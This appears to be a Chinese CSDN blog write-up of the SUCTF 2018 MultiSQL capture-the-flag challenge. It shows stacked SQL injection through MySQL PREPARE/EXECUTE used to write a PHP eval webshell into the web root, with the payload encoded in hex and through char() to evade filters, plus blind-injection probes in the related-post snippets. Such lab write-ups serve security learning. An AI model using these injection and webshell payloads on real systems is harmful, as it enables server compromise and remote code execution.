[SUCTF 2018]MultiSQL(mysql预编译)

最新推荐文章于 2023-12-13 16:23:27 发布
最新推荐文章于 2023-12-13 16:23:27 发布
阅读量345 收藏 1
点赞数
分类专栏: Buuctf刷题篇 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/125734960
版权

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

这个上传点不知道怎么利用,但是在用户信息这里存在注入
在这里插入图片描述
过滤的有点多,substr被过滤,可以用mid
在这里插入图片描述
后面越做越迷糊,还是太菜了

----------------参考WP--------------

知道了flag 不在数据库中,反倒是利用存在的堆叠注入去getshell,然后读文件

这里题目叫multi sql,根据wp 来看是做了预编译处理

-----------MySQL预处理技术----------

这道题做的有点迷糊,先做个记录再复习

select * from sc where cno=1;set @a='select 1,2,3';prepare test from @a;execute test ;
在这里插入图片描述

这道题就是用这种方法写shell

select hex("select '<?php eval($_POST[cmd]);?>' into outfile '/var/www/html/favicon/shell.php';");

73656C65637420273C3F706870206576616C28245F504F53545B636D645D293B3F3E2720696E746F206F757466696C6520272F7661722F7777772F68746D6C2F66617669636F6E2F7368656C6C2E706870273B

set @a=0x73656C65637420273C3F706870206576616C28245F504F53545B636D645D293B3F3E2720696E746F206F757466696C6520272F7661722F7777772F68746D6C2F66617669636F6E2F7368656C6C2E706870273B;

prepare test from @a;execute test;

除了用16进制表示,还可以用 char函数
set @a=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)

在这里插入图片描述

paidx0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 605
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在注册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。注册页面不好使,然后就看WP了 二、 学到的&&am
buuctf-web-[SUCTF 2018]MultiSQL1
mlws1900的博客
03-11 561
flag{1cc63c44-f1b0-40c0-a64e-fdc8bfe4f503}删删改改四五回,哥们只是想混个勋章,太折磨人了,看到我文章有罗里吧嗦的地方见谅,我其他文章都是以精简为主,不在乎文章分数,为了这个勋章,我只好车轱辘话转来转去(这一段就是这个作用)可以读/var/www/html/index.php文件,读取/var/www/html/user/user.php文件(这种方法跑十几分钟也跑不出来)存在各种限制,select,union,直接用char绕过(太菜,用其他绕过写马失败)
BUUCTF--[SUCTF 2018]MultiSQL
qq_46263951的博客
07-28 374
进入之后是这样的页面,我们先来注册一个帐号 查看用户信息 在?id=后存在一个sql盲注,我们来尝试一下?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入,2异或0还是为2 经过fuzz测试后发现这里过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句select '<?php eval($_POST[.
[SUCTF 2018]MultiSQL-MySQL预处理
qq_61142406的博客
05-26 245
MySQL传统处理: 客户端准备sql语句 发送sql语句到MySQL服务器 MySQL服务器执行sql语句 服务器执行结果返回客户端 预处理基本策略: 将sql语句强制一分为二: 第一部分为前面相同命令和结构部分 第二部分为后面可变数据部分 首先将前面的sql语句发送给MySQL服务器,让其先执行溢出预处理(并没有真正的执行)第一次发送sql语句的时候将其中可变的数据部分都用一个数据占位符来表示,比如问号? 不带参数的预处理 准备预处理语句 prepare 语句名称 from “预处理的sql
[SUCTF 2018]MultiSQL(预处理)
qq_62046696的博客
12-31 1006
通过命令获得flag ,可能是我做题少吧,第一次 看见sql中采用预处理然后写入webshell,最后得flag,反过来分析,通过上传文件给了一个可读写权限得路径,一步步收集信息,只能说自己太菜了。wp是通过盲注,然后一个个读取user.php的源码,我简单的跑了一下半个小时也跑不出来,所以我觉得这种方法并不太实用。异或可以然后试试,发现呃呃呃应该是过滤了,fuzz发现就剩了几个符号包括分号,想到了堆叠注入分号链接。为什么有写入权限呢,因为文件上传都是传到了这个目录的里面,所以有可写的权限。
[SUCTF 2018]MultiSQL
fmyyy1的博客
05-07 715
场景 注册登录 进入用户信息页面。 看到url中多了id参数,修改。 做到这已经知道是sql注入题。测试后知道这里可以异或布尔盲注和堆叠注入,但后面就注不出来了。fuzz后发现过滤了union,select之类的关键字。 参考wp,这里要用预处理写shell。 str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';" len_str=len(str) for i in r
一文搞懂MySQL预编译
09-08
MySQL预编译是一种提高数据库操作效率的技术,尤其在处理大量重复SQL语句时效果显著。预编译的主要目的是减少语法检查和编译的开销,从而提升数据库的性能。本文将深入探讨MySQL预编译的概念、好处、执行过程以及...
MySQL预编译功能详解
12-16
MySQL预编译功能是一种优化技术,主要用于提高数据库操作的性能,特别是在执行大量重复的SQL语句时。预编译的核心思想是将SQL语句的语法检查和编译过程提前到第一次执行时完成,之后只需替换不同的参数即可,避免...
MySQL预编译功能
04-07
MySQL 预编译功能 MySQL 预编译功能是指在执行 SQL 语句之前,对 SQL 语句进行编译和优化,以提高执行效率。在 MySQL 中,预编译功能可以通过使用 Prepare 语句来实现。 预编译功能的优点是可以减少 SQL 语句的...
解析如何加快mysql编译的速度
12-15
总结来说,优化MySQL的编译速度涉及多个方面,包括编译参数的选择、并行编译、预编译头文件、编译器优化、资源管理以及定制化编译选项等。在实际操作中,应根据具体需求和环境进行权衡,找到最适合自己的方法。不过...
[SUCTF 2018]MultiSQL-MySQL预处理学习
cjdgg的博客
05-11 389
[SUCTF 2018]MultiSQL-MySQL预处理学习 进入题目后,注册账户登录 编辑头像可以上传文件,但是上传了php文件还是会变成jpg格式 再看用户信息这里,id=2那里可以随意更改,存在越权,1就是admin 这里接下来要用到MySQL的预处理,参考文章 set MariaDB [(none)]> set @a='select version()'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> select
[SUCTF 2018]MultiSQL MYSQL 预处理写
最新发布
m0_64180167的博客
12-13 794
然后我们开始fuzz 发现 select ,union 都没了。首先这道题需要预处理写马 之前在ctfshow中学习过预处理。发现可以闭合 所以这里是存在堆叠注入的。这里就实现了绕过 并且执行了命令。首先我们开始判断是否存在注入。所以我们看看能不能写木马。
BUUCTF:[SUCTF 2018]MultiSQL
末初的CSDN博客
04-01 2330
BUUCTF:[SUCTF 2018]MultiSQL 两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell 二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息 ?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入 ...
buu-[SUCTF 2018]MultiSQL
qaq517384的博客
10-23 259
打开环境,只有登录和注册界面,admin已存在,随便注册一个算了 登录后有两个选项 头像界面就是一个文件上传,象征性的传一张,得到一个文件夹,可以正常访问 用户信息界面还有url的user/user.php?id=2 很明显的sql注入(如果考点是注入的话) 看一眼题目,然后默默的吧id改成1,能看到admin但是没有用 测了一下字符型和整形注入都没回显 脚本不知道为什么没有返回值,浏览器是能成功访问的 ?id=1^(ascii(mid(user(),1,1))>0) 就手注了一下user()是
2018 SCTF 部分wp
Risker
06-21 2079
弱弱的web狗表示简直就没有活路....Webeasiest  web-phpmyadmin参考这篇:地址执行以下sql语句:set global general_log='on'; SET global general_log_file='D:/phpStudy/WWW/cmssssacsd.php'; SELECT '&lt;?php assert($_POST["cmd"]);?&gt;'用...
BUUCTF:[SUCTF2018]followme
末初的CSDN博客
11-12 1836
https://buuoj.cn/challenges#[SUCTF2018]followme 导出HTTP,这里大部分文件内容显示貌似再爆破admin密码 有点多,尝试整个文件夹找一下相关关键字,例如CTF、flag之类的 grep -r 'CTF' ./new/ flag{password_is_not_weak} ...
[SUCTF 2018]GetShell
怪味巧克力的博客
07-12 1514
0x01 进入题目 有一个上传页面 那看来就是要上传shell,然后来查看flag了。看一下页面给的代码 if($contents=file_get_contents($_FILES["file"]["tmp_name"])){ $data=substr($contents,5); foreach ($black_char as $b) { if (stripos($data, $b) !== false){ die("illegal char")
mysql预编译sql
06-10
MySQL预编译SQL指的是在执行SQL语句之前,先将SQL语句编译成一个预编译语句,然后再将参数传递给这个预编译语句进行执行。这样可以提高SQL语句的执行效率,避免SQL注入等安全问题。 在MySQL中,可以使用PreparedStatement接口来实现预编译SQL。使用PreparedStatement时,首先需要调用Connection对象的prepareStatement方法来获取一个PreparedStatement对象,然后可以使用setXXX方法设置参数值,最后调用execute方法执行预编译语句。 例如,下面的代码片段演示了如何使用PreparedStatement来执行一条预编译SQL语句: ```java String sql = "SELECT * FROM user WHERE username = ? AND password = ?"; PreparedStatement stmt = conn.prepareStatement(sql); stmt.setString(1, "testuser"); stmt.setString(2, "testpassword"); ResultSet rs = stmt.executeQuery(); ``` 在上面的代码中,使用了"?"占位符来代替变化的参数值。然后通过PreparedStatement的setXXX方法来设置参数值,最后调用executeQuery方法来执行SQL语句。这样就可以实现预编译SQL的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值